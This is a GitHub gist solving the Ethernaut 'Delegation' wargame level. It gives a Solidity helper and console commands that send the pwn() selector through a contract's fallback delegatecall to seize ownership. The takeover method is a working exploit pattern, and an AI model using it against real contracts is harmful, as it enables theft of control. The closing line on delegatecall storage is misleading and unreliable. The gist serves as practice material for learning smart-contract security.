Created
June 25, 2022 19:08
-
-
Save SilviaMargaritaOcegueda/8163b5c90e4540f2b19cd35f6b31af74 to your computer and use it in GitHub Desktop.
Level 6 - Delegation - Ethernaut
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.6.0; | |
contract DelegationHack { | |
function delegationHack() public pure returns (bytes memory) { | |
bytes memory functionID = abi.encodeWithSignature("pwn()"); | |
return functionID; | |
} | |
} | |
https://solidity-by-example.org/fallback/
Fallback is a function that does not take any arguments and does not return anything.
It is executed either when:
-a function that does not exist is called or
-Ether is sent directly to a contract but receive() does not exist or msg.data is not empty
Fallback has a 2300 gas limit when called by transfer or send.
Option 1:
- deploy a contract to get the 4 bytes signature of the function pwn()
- await contract.sendTransaction({data: "0xdd365b8b"}); // function ID, selector or signature
Option 2:
- Call the pwn() function
const data = web3.utils.sha3("pwn()"); // this retrieves the complete hash instead of the first 4 bytes - Pass this information to the data property which will assign msg.data
await contract.sendTransaction({ data });
Finally, check on who’s now the owner of the contract:
await contract.owner();
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
A delegate call doesn’t change the target contract’s storage.